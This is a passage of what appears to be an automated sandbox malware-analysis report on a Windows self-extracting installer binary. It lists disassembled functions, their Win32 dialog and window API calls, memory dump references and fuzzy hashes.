                                                                  • GetDlgItem.USER32(?,00000002), ref: 004082A7
                                                                  • EnableWindow.USER32(00000000), ref: 004082AA
                                                                  • GetDlgItem.USER32(?,000004B5), ref: 004082BE
                                                                  • ShowWindow.USER32(00000000), ref: 004082C1
                                                                    • Part of subcall function 00407134: GetDlgItem.USER32(?,000004B6), ref: 00407142
                                                                    • Part of subcall function 00407B33: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                                                    • Part of subcall function 00407B33: GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                                                    • Part of subcall function 00407B33: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                                                    • Part of subcall function 00407B33: wsprintfW.USER32 ref: 00407BBB
                                                                    • Part of subcall function 00407B33: ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                                                    • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                    • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                                    • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                    • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                    • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                    • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                                    • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                    • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                    • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                                    • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: Item$Window$MessageSend$System$EnableHandleLoadLongMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                  • String ID:
                                                                  • API String ID: 855516470-0
                                                                  • Opcode ID: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                                                  • Instruction ID: 3ce0214ef3d03b0ee840dd4ab9c121ae631e901bc0d6870238ad5b6e85178a64
                                                                  • Opcode Fuzzy Hash: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                                                  • Instruction Fuzzy Hash: 014174B0644748ABDA206F65DD49F5B7BADEB40B05F00847DF552A62E1CB79B800CA1C
                                                                  Function 00403093 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 244stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,hAA,00000000), ref: 004030F6
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,hAA,00000000), ref: 004030FE
                                                                  • strncmp.MSVCRT ref: 004031F1
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00403255
                                                                  • lstrcmpW.KERNEL32(?,SetEnvironment,00000000), ref: 00403273
                                                                  • ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$lstrcmpstrncmp
                                                                  • String ID: GUIFlags$MiscFlags$SetEnvironment$hAA${\rtf
                                                                  • API String ID: 2881732429-172299233
                                                                  • Opcode ID: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                                                  • Instruction ID: da55d09168dcf28f6e950782b6654b171f18f9ca5632fa18d2c46afc5d57570a
                                                                  • Opcode Fuzzy Hash: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                                                  • Instruction Fuzzy Hash: 23819D31900218ABDF11DFA1CD55BEE7B78AF14305F1040ABE8017B2E6DB78AB05DB59
                                                                  Function 00406A47 Relevance: 24.3, APIs: 16, Instructions: 270COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000004B3), ref: 00406A69
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00406A6E
                                                                  • GetDlgItem.USER32(?,000004B4), ref: 00406AA5
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00406AAA
                                                                  • GetSystemMetrics.USER32(00000010), ref: 00406B0B
                                                                  • GetSystemMetrics.USER32(00000011), ref: 00406B11
                                                                  • GetSystemMetrics.USER32(00000008), ref: 00406B18
                                                                  • GetSystemMetrics.USER32(00000007), ref: 00406B1F
                                                                  • GetParent.USER32(?), ref: 00406B43
                                                                  • GetClientRect.USER32(00000000,?), ref: 00406B55
                                                                  • ClientToScreen.USER32(?,?), ref: 00406B68
                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00406BCE
                                                                  • GetClientRect.USER32(?,?), ref: 00406C55
                                                                  • ClientToScreen.USER32(?,?), ref: 00406B71
                                                                    • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                                  • GetSystemMetrics.USER32(00000008), ref: 00406CD6
                                                                  • GetSystemMetrics.USER32(00000007), ref: 00406CDD
                                                                    • Part of subcall function 00406A18: GetDlgItem.USER32(?,?), ref: 00406A36
                                                                    • Part of subcall function 00406A18: SetWindowPos.USER32(00000000), ref: 00406A3D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                                  • String ID:
                                                                  • API String ID: 747815384-0
                                                                  • Opcode ID: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                                                  • Instruction ID: 701d8c843d4ec3579feae24e97f284edc15b0bac0439a5efdbaa5111af673c9b
                                                                  • Opcode Fuzzy Hash: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                                                  • Instruction Fuzzy Hash: 7B912D71A00209AFDB14DFB9CD85AEEB7F9EF48704F148529E642F6290D778E9008B64
                                                                  Function 00407D06 Relevance: 22.7, APIs: 15, Instructions: 231windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                  • LoadIconW.USER32(00000000), ref: 00407D33
                                                                  • GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                  • GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                  • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                  • LoadImageW.USER32(00000000), ref: 00407D54
                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                  • SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                  • GetWindow.USER32(?,00000005), ref: 00407E76
                                                                  • GetWindow.USER32(?,00000005), ref: 00407E92
                                                                  • GetWindow.USER32(?,00000005), ref: 00407EAA
                                                                  • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,0040803E), ref: 00407F0A
                                                                  • LoadIconW.USER32(00000000), ref: 00407F0D
                                                                  • GetDlgItem.USER32(?,000004B1), ref: 00407F28
                                                                  • SendMessageW.USER32(00000000), ref: 00407F2F
                                                                    • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                                    • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                                                    • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                    • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: Window$HandleItemLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                                  • String ID:
                                                                  • API String ID: 1889686859-0
                                                                  • Opcode ID: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                                                  • Instruction ID: b6a50195b8a608de49edc5b96f3e83ee8a9b90890169e94b1220211b89b9884f
                                                                  • Opcode Fuzzy Hash: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                                                  • Instruction Fuzzy Hash: E861D47064C7096AE9257B61DC4AF3B3699AB40B05F10447FF642B92D2DBBCBC0056AF
                                                                  Function 00406F37 Relevance: 16.6, APIs: 11, Instructions: 87windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 00406F45
                                                                  • GetWindowLongW.USER32(00000000), ref: 00406F4C
                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 00406F62
                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 00406F7F
                                                                  • GetSystemMetrics.USER32(00000031), ref: 00406F91
                                                                  • GetSystemMetrics.USER32(00000032), ref: 00406F98
                                                                  • GetWindowDC.USER32(?), ref: 00406FAA
                                                                  • GetWindowRect.USER32(?,?), ref: 00406FB7
                                                                  • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00406FEB
                                                                  • ReleaseDC.USER32(?,00000000), ref: 00406FF3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                  • String ID:
                                                                  • API String ID: 2586545124-0
                                                                  • Opcode ID: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                                                  • Instruction ID: b1ff7c23223d170b9333fa97acec74f2c9230ee3eabfe87d0be763292bfdf634
                                                                  • Opcode Fuzzy Hash: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                                                  • Instruction Fuzzy Hash: 8E210C7650021ABFCF01AFA8DD48DDF7F69FB08351F008565FA15E21A0C775EA209B64
                                                                  Function 0040677A Relevance: 13.5, APIs: 9, Instructions: 47windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000004B3), ref: 0040678E
                                                                  • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067A1
                                                                  • GetDlgItem.USER32(?,000004B4), ref: 004067AB
                                                                  • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067B3
                                                                  • SendMessageW.USER32(?,00000401,?,00000000), ref: 004067C3
                                                                  • GetDlgItem.USER32(?,?), ref: 004067CC
                                                                  • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004067D4
                                                                  • GetDlgItem.USER32(?,?), ref: 004067DD
                                                                  • SetFocus.USER32(00000000,?,000004B4,74DF0E50,00407E06,000004B4,000004B3,00000000,000004B4,00000000,000004B2,?,000004B7), ref: 004067E0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMessageSend$Focus
                                                                  • String ID:
                                                                  • API String ID: 3946207451-0
                                                                  • Opcode ID: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                                                  • Instruction ID: e7a8c5b21de344c7c4c5496bf688f1d5cc3ba414acf11b32f4788b893cc62525
                                                                  • Opcode Fuzzy Hash: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                                                  • Instruction Fuzzy Hash: 6FF04F712403087BEA212B61DD86F5BBA6EEF81B45F018425F340650F0CBF7EC109A28
                                                                  Function 0040C3D8 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 480COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0040C603
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@
                                                                  • String ID: IA$IA$IA$IA$IA$IA
                                                                  • API String ID: 613200358-3743982587
                                                                  • Opcode ID: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                                                  • Instruction ID: 4cebfcab61734def35128a955d6a3e34031d8899c11ca8f9bd2aeb72941b6852
                                                                  • Opcode Fuzzy Hash: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                                                  • Instruction Fuzzy Hash: D2221671900248DFCB24EF65C8D09EEBBB5FF48304F50852EE91AA7291DB38A945CF58
                                                                  Function 004083B6 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 196COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,00417788,00000000,SetEnvironment), ref: 00408479
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@
                                                                  • String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle
                                                                  • API String ID: 613200358-994561823
                                                                  • Opcode ID: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                                                  • Instruction ID: 5566f9f9667118f06bc812855c9affabb63102f3a10b3971892d5eca1131561f
                                                                  • Opcode Fuzzy Hash: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                                                  • Instruction Fuzzy Hash: CA51D47080420AAACF24AB559E85AFB7774EB20348F54443FF881722E1EF7D5D82D64E
                                                                  Function 00406DB2 Relevance: 12.1, APIs: 8, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memcpy.MSVCRT(?,00417410,00000160), ref: 00406DD1
                                                                  • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00406DF0
                                                                  • GetDC.USER32(00000000), ref: 00406DFB
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00406E07
                                                                  • MulDiv.KERNEL32(?,00000048,00000000), ref: 00406E16
                                                                  • ReleaseDC.USER32(00000000,?), ref: 00406E24
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00406E4C
                                                                  • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_0000667A), ref: 00406E81
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                                  • String ID:
                                                                  • API String ID: 2693764856-0
                                                                  • Opcode ID: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                                                  • Instruction ID: b2c1943609947f3a034a1f42a4fd453b3666a2b5c4d4ccfd9a1c2059c5c1cb6f
                                                                  • Opcode Fuzzy Hash: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                                                  • Instruction Fuzzy Hash: C32184B5500218BFDB215F61DC45EEB7B7CFB08746F0040B6F609A1190D7748E948B65
                                                                  Function 0040695E Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDC.USER32(?), ref: 0040696E
                                                                  • GetSystemMetrics.USER32(0000000B), ref: 0040698A
                                                                  • GetSystemMetrics.USER32(0000003D), ref: 00406993
                                                                  • GetSystemMetrics.USER32(0000003E), ref: 0040699B
                                                                  • SelectObject.GDI32(?,?), ref: 004069B8
                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004069D3
                                                                  • SelectObject.GDI32(?,?), ref: 004069F9
                                                                  • ReleaseDC.USER32(?,?), ref: 00406A08
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                  • String ID:
                                                                  • API String ID: 2466489532-0
                                                                  • Opcode ID: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                                                  • Instruction ID: 7c755332e1b278278a0584394201b19561512224090c74d51841a9ad660c27ee
                                                                  • Opcode Fuzzy Hash: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                                                  • Instruction Fuzzy Hash: 6B216871900209EFCB119F65DD84A8EBFF4EF08321F10C46AE559A72A0C7359A50DF40
                                                                  Function 00407B33 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                                                  • GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                                                  • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                                                  • wsprintfW.USER32 ref: 00407BBB
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                  • String ID: %d%%
                                                                  • API String ID: 3753976982-1518462796
                                                                  • Opcode ID: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                                                  • Instruction ID: b955b8041d8a67620c3180d4911c799512bd6939d195f5b55c3092177650065a
                                                                  • Opcode Fuzzy Hash: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                                                  • Instruction Fuzzy Hash: 1D31D371904208BBDB11AFA0CC45EDA7BB9EF48708F10847AFA42B61E1D779B904CB59
                                                                  Function 0040408B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(hAA,00000020,?,?,00405838,?,?,?,00000000,?), ref: 004040A4
                                                                    • Part of subcall function 00401A85: CharUpperW.USER32(?,74DEE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                    • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404156
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040415E
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040416D
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404175
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$CharUpper$lstrlen
                                                                  • String ID: hAA
                                                                  • API String ID: 2587799592-1362906312
                                                                  • Opcode ID: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
                                                                  • Instruction ID: 7f7e13310b21401de90169bcc26cd057e2afddf23eedd5de54135d69024cf91c
                                                                  • Opcode Fuzzy Hash: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
                                                                  • Instruction Fuzzy Hash: D7212772D40215AACF20ABA4CC46AEB77B9DF90354F10407BEB41BB2E1E7789D848658
                                                                  Function 00404CBC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000001,00000000,00000000,00000001,?,00000000), ref: 00404D3E
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DA0
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DB8
                                                                    • Part of subcall function 00403354: lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                                                    • Part of subcall function 00403354: GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                                                    • Part of subcall function 00403354: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                                                    • Part of subcall function 00403354: ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$FileTime$AttributesSystemlstrlen
